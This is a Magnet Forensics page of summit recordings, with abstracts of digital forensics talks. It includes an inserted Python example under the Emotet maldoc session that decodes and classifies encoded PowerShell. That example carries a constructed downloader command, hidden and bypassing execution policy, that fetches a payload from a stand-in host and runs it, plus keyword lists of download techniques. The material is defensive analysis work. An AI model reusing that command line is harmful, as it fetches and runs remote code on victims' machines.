Magnet Virtual Summit Recordings
Browse our Magnet Virtual Summit Recordings
Throughout May, we offered our first Magnet Virtual Summit—a wide selection of fantastic thought leadership presentations, Magnet Forensics product sessions, and labs all in an easy virtual format. The recordings from this live virtual event can be found below.
Magnet Virtual Summit // NA & EMEA
A Blessing In Disguise: How To Conduct Remote Mobile Acquisitions For Investigations & Preservation
One of the biggest handicaps to device acquisition and analysis is getting information from devices that are not geographically accessible, or when time is not on the investigator’s side. In the past, the only methods of collecting mobile devices were on-site collections or various cloud management solutions, which gave a person of interest time to coordinate deletion of data before the collection. Thanks to new advances in forensic tools and techniques, more options may now be available. By demonstrating these remote capabilities for both iOS and Android devices, this session shows how an investigator can take a more concise approach to device collection, with potential cost savings and reduced legal ramifications.
Collaboration To Combat Online Child Exploitation
Learn how Canada is working with ProjectVic and Magnet Forensics to protect children and combat online Child Sexual Exploitation (CSE). The session also includes a case study on exporting identifiers into other intelligence systems to establish how a suspect is communicating with other CSE offenders and possibly targeting children.
Creating A Digital Forensic Workflow to Combat Data Exfiltration
As my boss once told me first thing on a Monday morning, “No pressure, but you have a day to figure out how the data was stolen”. This presentation is based on several case studies where data was exfiltrated and the digital forensic fingerprints left behind.
Cryptocurrency Investigation And Following The Transaction Trail
With the increasing usage of cryptocurrencies and blockchains in today’s world, eDiscovery professionals need to understand how these emerging technologies should be considered and investigated as part of data discovery and legal discovery processes. This session will highlight both cryptocurrencies and blockchains, and provide attendees with fundamental information that will help them understand how to examine and investigate these technologies and the electronically stored information that results from their usage.
Dude, Where Are My (Encryption) Keys?! A Reverse Engineer’s Take On Secure Messaging For Mobile
Would you consider buying a new car that had no keys, invisible locks, and only a written commitment from the dealership that the car is only going to respond to you and can’t be stolen by any random person walking by?
Yet in the world of secure messaging, this exact scenario plays out every day: the general public are expected to make informed decisions on what apps they should be trusting their private data with. They must decide based on marketing jargon, download counts and customer reviews, and the media. Security, and by extension secure messaging, are at the forefront of our minds more than any time in history. This talk explores just how reliable these sources are from the perspective of a reverse engineer. From the impressive, to the laughable, to the downright creepy – popular secure chat apps will be put under the microscope.
Reverse engineering is a subject many forensics professionals know about, but seldom think to apply to their forensic examinations. We will also present on a real-world example where reverse engineering proved indispensable in refuting an alibi for a homicide file.
Emoting Over Emotet And Maldoc
Malicious documents delivered as email attachments have wreaked, and continue to wreak, havoc on individual users, the private sector, and local and federal government. According to Verizon’s 2018 Data Breach report, 32% of all data breaches derived from phishing attacks. Avanan’s email security report finds that 1 in 25 branded emails is a phishing email, and that 42% of all malicious email attachments pose as Microsoft. Symantec reports that 48% of all malicious email attachments are crafted as Microsoft Office documents. Malwarebytes reports a significant rise in Emotet and Trickbot malspam campaigns in 2018, and that as of Q1 2019 Emotet and Trickbot accounted for 61% of all malicious email payload deliveries.
This presentation will focus on malicious document analysis as it relates to Adobe PDFs and Microsoft Office documents. It will cover numerous open source tools that allow the forensic examiner to identify, extract and analyze malicious content embedded within PDF and Office documents. During the presentation I will discuss and illustrate how malware authors take advantage of macros within Microsoft Office documents by implementing malicious scripts (JavaScript in PDFs, VBA in Office macros), and provide techniques for analyzing these scripts. With living-off-the-land techniques on the rise, this presentation will cover how to locate and decode base64-encoded and obfuscated PowerShell scripts embedded within malicious documents. During this analysis process I will discuss how to identify whether the malicious document is a dropper or a downloader and what threat intelligence can be obtained from the data. Lastly, I will illustrate how to locate, extract and analyze embedded shellcode from within malicious documents, and explain how and why shellcode is used for malicious intent.
This presentation will use current malware and malicious document samples such as Emotet and Trickbot to provide attendees with techniques for analyzing malspam incidents using freely available open source analysis tools. The outcome of this presentation is to further enhance participants’ data breach investigations, identify methods for building YARA rules or IOCs to harden and defend their networks, and show how to fold these analysis techniques into existing incident response tools and automation processes.
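The base64 and dropper-versus-downloader triage described above, as an added worked example that is not part of the presentation or of any Magnet Forensics tool. It takes the kind of command line a malicious macro spawns (a constructed sample here, not a real Emotet payload, with a reserved example.invalid host), decodes the -EncodedCommand argument (the base64 wraps UTF-16LE, which is where many first attempts at decoding go wrong), strips the simple 'ht'+'tp' string splitting and backtick escapes seen in obfuscated loaders, and then reports URLs and a rough dropper/downloader verdict from keyword hints. The hint lists and regular expressions are assumptions chosen for this example, not a complete detection.

```python
import base64
import re
from typing import Optional

# PowerShell's -EncodedCommand (any unambiguous prefix: -e, -ec, -enc, ...) takes
# base64 over a UTF-16LE string, so decoding it as UTF-8 yields NUL-interleaved junk.
ENCODED_ARG_RE = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)

# What we want out of a decoded script.
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)
# Keyword hints are an assumption for this example, not an exhaustive list.
DOWNLOAD_HINTS = ("downloadfile", "downloadstring", "invoke-webrequest",
                  "net.webclient", "start-bitstransfer", "iwr ")
DROP_HINTS = ("frombase64string", "writeallbytes", "set-content", "[io.file]")


def encode_powershell(script: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script from a command line, or None if there is none."""
    match = ENCODED_ARG_RE.search(cmdline)
    if not match:
        return None
    blob = match.group(1)
    blob += "=" * (-len(blob) % 4)            # tolerate stripped padding
    try:
        raw = base64.b64decode(blob, validate=True)
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def deobfuscate(script: str) -> str:
    """Undo two cheap tricks: 'ht'+'tp' string splitting and backtick escapes.

    Backtick is also PowerShell's escape character (`n, `t), so this is an
    IOC-hunting normalisation, not a faithful interpreter.
    """
    script = re.sub(r"'\s*\+\s*'", "", script)
    script = re.sub(r'"\s*\+\s*"', "", script)
    return script.replace("`", "")


def classify(script: str) -> dict:
    """Report URLs and a rough dropper/downloader verdict for a decoded script."""
    cleaned = deobfuscate(script)
    lowered = cleaned.lower()
    urls = sorted(set(URL_RE.findall(cleaned)))
    downloads = bool(urls) or any(h in lowered for h in DOWNLOAD_HINTS)
    drops = any(h in lowered for h in DROP_HINTS)
    if downloads and drops:
        kind = "both"
    elif downloads:
        kind = "downloader"
    elif drops:
        kind = "dropper"
    else:
        kind = "unknown"
    return {"kind": kind, "urls": urls, "script": cleaned}


def analyze_cmdline(cmdline: str) -> Optional[dict]:
    """Decode then classify; None when the command line carries no encoded script."""
    script = decode_encoded_command(cmdline)
    return None if script is None else classify(script)


# Constructed sample (not a real Emotet payload; example.invalid is a reserved
# name). The string splitting hides "http://" from a naive URL grep.
SAMPLE_SCRIPT = ("$u='ht'+'tp://example.invalid/a/x.bin';"
                 "$p=$env:TEMP+'\\x.exe';"
                 "(New-Object Net.WebClient).DownloadFile($u,$p);"
                 "Start-Process $p")
SAMPLE_CMDLINE = ("powershell.exe -nop -w hidden -ep bypass -enc "
                  + encode_powershell(SAMPLE_SCRIPT))

if __name__ == "__main__":
    result = analyze_cmdline(SAMPLE_CMDLINE)
    print(result["kind"], result["urls"])
```

The verdict is deliberately coarse: a script that both fetches a stage and writes decoded bytes to disk is reported as "both", and anything that matches neither hint list is "unknown" rather than guessed. Feed the decoded script to a proper analysis (or the URLs to your threat-intel process) rather than trusting the keyword match alone.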
Fighting Irish Fighting Crime: College Students Serving as Sworn Investigators
Police investigations today are shaped by the digital world. With the increasing availability of technology, digital evidence is now considered in every case and often holds the incriminating or exonerating evidence. Cell phones, computers, social media accounts, IoT devices, and other digitally enabled devices are now considered crucial evidence, and the ability to retrieve this information is more valued than ever. With this influx of digital information, police agencies everywhere are struggling to analyze the sheer volume of digital evidence with which they are presented. Additionally, finding qualified investigators who are well versed and educated in the field of technology has become more important than ever. This talk will discuss how the St. Joseph County (Indiana) Cyber Crimes Unit found a solution that addresses the influx of digital evidence in law enforcement. By forming a unique partnership with the University of Notre Dame, the Cyber Crimes Unit has recruited and educated undergraduate students to serve as sworn investigators. The sworn-in student investigators use Magnet Forensics AXIOM, GrayKey, and open source investigation among other forensic tools to keep up with increased demand for digital evidence analysis. In fact, by swearing in student investigators, the county has reduced its digital case backlog from 30 days to zero since the beginning of the partnership.
I Run A Digital Forensics Unit And I Am A Terrible Manager
I am the Director of the St. Joseph County, IN Cyber Crimes Unit. The unit consists of ten college students, one high school student, and myself. We’ve all heard the horror stories about this generation of workers, which currently accounts for over 50% of the workforce. Among other things, they are entitled, lazy, unmotivated, disloyal, and selfish. Combine that with the fact that I am a terrible manager and it sounds like a recipe for disaster. But it hasn’t been.
The unit has been successful beyond imagination. We analyze over 500 devices a year. Our case backlog is zero cases. Our turnaround time is routinely same day. This talk will discuss a new paradigm in the workforce and our forensics lab. When I became the Cyber Crimes Director, I had no formal training or experience as a manager. So I bucked the conventional wisdom of management and decided not to manage at all.
Instead, I took the approach of being a leader. What I’ve learned through leadership is that if you take care of the people taking care of the work, the people taking care of the work will excel beyond expectations. This simple concept that you manage things, but you lead people, will be discussed. Lessons from this talk can be applied by anyone in any industry to usher in a new era of the end of management and a focus on leadership at every level.
MacOS Forensics: The Next Level – Taming The T2 Chip & More
So, you wanna do mac forensics, but your department won’t buy the mac forensics tools? You have a mac with the T2 chip and can’t image with conventional imagers? Or T2 + FileVault/Encrypted APFS? Not to worry! Contrary to popular belief, you don’t need expensive specialist tools to perform mac forensics. We explain the internals and show you how it’s done with open source tools. From creating your own forensic boot disk to imaging and analysis of APFS on T2 macs, empower yourself with open source, and complement your existing forensic toolset! We’ll showcase some new artifacts too.
Malware And More: A Look Into Windows Memory
In many cases, memory analysis can provide access to data you can’t get through “dead-box” forensics alone and may be the only way to obtain evidence critical to solving your investigation. Malware investigations in particular can benefit significantly from memory analysis, but that is not the only type of investigation in which memory analysis can play a crucial role. This session will discuss how Magnet AXIOM’s integration of core plugins from the popular tool Volatility makes deep memory analysis more accessible to forensic examiners. Learn how to incorporate memory artifacts into a broader timeline together with artifacts from other data sources for a well-rounded investigation. In addition, we’ll explore the free tool MAGNET Process Capture to analyze memory from specific processes, providing a less fragmented output and better data recovery.
Need for Speed with Magnet OUTRIDER
This presentation will focus on the development and deployment of an extremely quick triage tool, Magnet OUTRIDER. This tool was designed to help examiners prioritize which evidence to analyze first in their investigations, whether on-scene or back in the lab, using automation tools on seized exhibits. We will describe how and why OUTRIDER was developed, followed by how the tool has been piloted in multiple countries and refined by feedback from the field. We will also provide examples of various use cases where OUTRIDER has been utilized.
During this presentation, see how the tool works, get insights into future developments and, as an attendee, have the opportunity to share any feedback you have regarding the tool. See for yourself how the tool can vastly reduce the number of devices seized while on-scene, or how to quickly triage multiple devices back at the lab to reduce backlogs, in this webinar on Magnet OUTRIDER.
Not Your Father’s Forensics
Data volumes are exploding, as are the potential data sources requiring analysis for investigations. Wading through such volumes takes time that corporations don’t have and carries unnecessarily high costs. For corporate investigations and compliance, growing data volumes create a pressing need for methods, technologies and processes that can quickly analyze massive amounts of communications and information.
One such technology is conceptual analytics, which has been used by corporations and government agencies to assist with document review, e-discovery and data management. Now, organizations are realizing that analytics has tremendous potential to improve efficiency and accuracy in data-intensive inquiries. Keyword searches can be very useful when you know exactly what it is that you are looking for, but no one calls a bribe a bribe. Shifting our approach toward analytics allows us to describe the ideas and activities at issue within a collection of exemplar paragraphs, and then let the analytics engine find and report the correlations and connections. Organizations facing investigations, or simply developing compliance assurance protocols, can include conceptual analytics in their initiatives to prioritize collection efforts, proactively audit corporate document populations, and identify priorities in the areas of training, monitoring and policy development. In today’s presentation we will discuss the foundations of analytics, and explore exciting new developments in workflows, methods, and applications – all of which can be leveraged in compliance initiatives and investigations of all kinds.
Performing Linux Forensic Analysis & Why You Should Care
Why do we need to learn Linux Forensics? Well, nowadays when you look at the number of tools available on different penetration testing systems running Linux, you should stop and ask yourself a basic question “are these tools and systems always going to be used for ethical purposes?” The answer is definitely, NO! Another reason to consider learning Linux forensics is that not everyone uses Windows. You may arrive at a crime scene only to find that your suspect’s computer is a Linux operating system! If you don’t have the proper skillset, you will be shocked and start to question your knowledge and abilities. What should I do? Do I have the skills required to collect data from this system? Where should I look for artifacts? What do these artifacts even look like? How can we identify and track user activity? etc. The goal of this workshop is to help DFIR analysts build the most important knowledge and skills that will give them confidence when encountering computers running a Linux OS, whether used as a desktop or server.
Practitioner Research Needs And Academic Support Through Graduate Programs
Join Joe Walsh from DeSales University for an insightful review of the research being conducted by graduate students and the impact it’s having on the forensics community. This will be an interactive presentation, so please come prepared to discuss training needs and research possibilities. Participants will have the opportunity to learn more about the digital forensics master’s degree programs and will be entered to win a graduate course for participation.
Putting the RDPieces Back Together Again
Ransomware investigations are becoming increasingly prevalent, and the questions an analyst is faced with are similar in almost every investigation:
- How did the attacker get in?
- How long did the attacker have access to the system(s)?
- What files/folders did the attacker access?
- Was there any data exfiltration?
A majority of ransomware now does “cleanup” after running, deleting and overwriting important data such as event logs, recent user activity, PowerShell commands, etc. This talk delves into an often-overlooked artifact, the RDP bitmap cache, which may contain the answers needed to make a determination one way or another on ransomware-related questions. It is a very interesting and very underutilized artifact that allows an analyst to quite literally piece together “what had happened was…”
Reverse Engineering Android for Examiners, An Introduction
Reverse engineering (RE) is a skill that represents foundational work that our favorite forensic tools are built upon. But when you as an examiner encounter an app that isn’t supported anywhere, what recourse do you have? Join Chris Atha (NW3C) and Mike Williamson (Magnet Forensics) for an introduction to the fascinating, ever-changing world of RE. After an overview of basic RE concepts, challenges, and potential use-cases for forensic examiners, participants will dive in to manipulating live Android apps using Frida, a popular open source toolkit for dynamic binary instrumentation (DBI). No prior programming knowledge required – we will walk you through the process. Just how easy is that vault passcode to bypass? Join us and find out!
Shall We Play A Game? Love To. How About The Internet Of Things Forensic Challenge?
Have you ever considered using the Internet of Things as evidence in your case? This session will give the audience hands-on experience focusing on the identification, collection and analysis of Internet of Things artifacts. The audience will work through case scenarios and gain practical experience, all while having fun with one of the world’s leading experts on Internet of Things forensics.
Taking A Byte of Chromebook Analysis
A new forensics challenge is upon us as Chromebooks become more and more popular. One part of the challenge is understanding the differences between what is obtained from the different types of acquisition and from the cloud. To tackle it, a group of 30 forensic examiners came together to workshop the problem at a Brews and Bytes event in Denver, Colorado. From that perch in the mile-high city, we assessed the data in the cloud as well as more terrestrial images from a Chromium VM and data from Chromebook acquisitions. The analysis team looked at the different locations where data can reside and compared the different types of acquisition. The team then built on the one-day workshop to develop the comparative analysis we will present of the types of data that can be recovered from the different sources associated with Chromebooks, and where it resides.
The Art Of Juggling: IR Circus Tricks For The Overwhelmed
Incident Response, like juggling flaming dumpsters or swallowing swords, is not for the faint of heart. When was the last time you did a collection where everything went exactly right? Or your analysis didn’t encounter a massive hitch? Join your ringmasters, Heather and Shelly, on an exciting trip to the IR Circus! We’ll share tips and tricks to help you juggle your sanity with collection and analysis tasks sure to impress your customers and your team!
The Evolution of Ransomware – Attack, Investigation, Response & Prevention Strategies
Ransomware attacks can present an existential threat to a targeted organization, and over time they have morphed and changed, becoming ever more sophisticated. With global ransomware attacks estimated as high as 204,000,000 incidents in 2018, this is not only a problem that is not going away soon, but one where prevention efforts are widely missing the mark. This presentation will look at the evolution of ransomware attack methods, and will focus on successful response and investigation strategies as well as emerging approaches to more effective prevention methods.
Thinking DFIRently: Utilizing Technology to Work Smarter Than Ever
We’re in a critical time for digital forensics where the ways we’re used to working cases may not be enough to keep up anymore. As the amount of digital evidence continues to grow, the amount of case backlogs grow with it. Digital forensics labs need to create a more efficient workflow by automating repetitive and predictable tasks—freeing up examiners to apply their expertise on the evidence at hand.
Join Jessica Hyde of Magnet Forensics and Aaron Sparling of the Portland Police Bureau Digital Forensics Unit as they deep dive into the challenges facing labs today and how a practical approach to leveraging automation can help increase efficiency and reduce backlogs in the forensics lab. They’ll cover the differences between traditional forensic workflows and the optimized Magnet AUTOMATE workflow, including new features in the latest AUTOMATE release. Next, find out how Aaron’s 2.5-person team at the Portland Police Bureau Digital Forensics Unit uses AUTOMATE to solve cases faster, integrates Magnet OUTRIDER to triage devices within AUTOMATE workflows, and conducts advanced deep-dive memory workflows.
Magnet Virtual Summit // APAC
Recordings from our APAC virtual event can be found listed below.
Welcome to our online conference. In addition to sharing the latest industry trends and changes, we will present the innovative new features of AXIOM 4.0, designed to help reduce case backlogs, recover evidence from the widest range of data sources, and improve the efficiency of digital forensic analysis.
“Carpe Diem” – Seize the scene including a multitude of endpoint devices and online services
Part I. Introducing a new integration framework for examining data from any sources:
- CARPE: an open-source digital forensic integration framework
- CARPE Internals – design concept and architecture
- Current development status
- Future development plans (including our research activities on DFIR)
Part II. Introducing our activities on IoT Forensics:
- Digital forensics in the IoT world
- Deep understanding of IoT ecosystem
- Strategies for digital investigation in the IoT world
- Case study: an AI speaker and a fitness tracker
Policy-making and capacity-building to combat cybercrime in Asia Pacific
Crime and drug challenges in Southeast Asia and the Pacific are multifaceted, and many are transnational in nature. Learn how UNODC has been engaging with Laos for the past two years to jointly set up the first Digital Forensics Laboratory. With the help of various technology providers, including Magnet Forensics, UNODC is continuously delivering training and mentoring to investigators to address the technical and legal challenges posed by new technologies and devices.
Because Apple regularly makes changes to macOS, investigating Mac devices is challenging. Learn about the latest macOS file system (APFS) and what changed in the move from HFS+ to APFS, and how Magnet AXIOM can round out your macOS investigations. In this webinar, 鑒真數位 will cover not only what changed in the macOS 10.15 (Catalina) update, but also macOS operating system artifacts and files such as KnowledgeC.db, FSEvents, volume mount points, quarantined files, AirDrop and bash history, and how to correlate these artifacts to support an investigation.
Malware And More: A Look Into Windows Memory (Chinese-language session)
In many investigations, memory analysis can provide data that conventional disk forensics cannot, and it may even be the only way to obtain the evidence critical to the case. Malware investigations in particular benefit greatly from memory analysis, but it plays an equally important role in other types of investigation. In this online session we will discuss the Volatility integration in Magnet AXIOM and how it lets examiners perform deep memory analysis more easily. Learn how to fold memory artifacts and artifacts from other data sources into a single timeline for a well-rounded investigation. We will also look at how to use the free Magnet Process Capture tool to analyze the memory of specific processes.
Magnet AXIOM: Cloud Forensic Investigations (Korean-language session)
- Introduction to cloud storage services
- Known cloud forensic investigation methods
- Evidence collection techniques and their limitations
- Analysis techniques for the collected evidence
Amid digital transformation, the use of cloud storage has become commonplace. As an extension of the storage on mobile devices, computers and Internet of Things (IoT) devices, cloud storage is an important data source for investigators in both the public sector and private enterprise, and is sometimes the only source from which data can be obtained. Even so, under legal or judicial procedural constraints, many investigators only obtain data from the storage inside the device, which limits the possibility of finding more data. In this webinar we will explore the differences between cloud storage and on-device storage, including the data available from each type of device, discuss why and how investigators miss this important data, and consider the potential consequences of missing it. Finally, we will look at the feasibility of acquiring cloud storage data from an operational-process perspective, turning adversity into opportunity. Join 鑒真數位 to learn in detail how to acquire cloud storage resources such as backups of Google (Google Takeout) and Facebook (Facebook Download My Data) user accounts, and how to link the various evidence sources using features such as correlation analysis and timelines.
Magnet Virtual Summit // LATAM
Recordings from our LATAM Day Event can be found below.
Corporate Investigations With AXIOM CYBER (Spanish-language session)
Risks and challenges in the corporate sphere are increasing in the face of new scenarios such as remote work, where fraud, theft of sensitive information, and external threats such as malware and ransomware attacks call for comprehensive investigations in which evidence can be acquired, analyzed and reported quickly.
Join our Spanish-language webinar, where Aaron Hernandez (LATAM accounts) and Enrique Banda (Sales Engineer at Magnet Forensics) will demonstrate how AXIOM CYBER can accelerate your corporate investigations while examining evidence sources on computers, smartphones and the cloud. In this session, Aaron will explain the importance of AXIOM CYBER for investigation, information security and audit teams, while Enrique Banda will present a case of leaked documents containing sensitive information, relying on remote acquisition capabilities and various analysis and examination functions to find the information critical to the investigation.
The New Models Of Forensic Investigation In The Public And Private Sectors (Portuguese-language session)
Digital forensic investigators, experts and auditors face not only technological challenges but also legal, administrative and institutional ones that frequently limit their room for action and decision-making.
Starting from a 360° view and a toolkit approach makes it possible to handle investigative tasks in a strategic and collaborative way. We therefore invite you to join this Portuguese-language session, in which our speakers will walk through three scenarios to explain how implementing technology and preventive measures can make a difference in 360° digital investigations in the so-called new reality.
Perspectives On The Future Of Digital Forensic Investigations After COVID-19: Rethinking A “New Normal” (Spanish-language session)
The COVID-19 pandemic has not only reshaped the global risk and threat agendas for the public and private sectors, it has also moved our way of working and interacting with others from a physical environment to a remote, virtual one. In that setting, connectivity and information flows have played a crucial role, since most operations have been kept running through computers, tablets, smartphones, IoT and the cloud. At the same time, computer crime has increased, because cybercrime has capitalized on this situation by exploiting vulnerabilities. The digital investigation process has become more complex as a result: factors such as the number of cases assigned per examiner, the large amounts of information stored per piece of evidence, the time factor, and the still-current social distancing with little possibility of physical access to evidence at workplaces or crime scenes are challenges that will have to be resolved within the framework of the “new normal”. The question is: are we prepared?
Join this webinar for perspectives on the future of digital forensic investigations from the public and private sectors, through the eyes of Lieutenant Wolfan Yessid Prada Roa, a member of Colombia’s Centro Cibernético Policial, and Dr. Aury Curbelo, CEO of Digitech.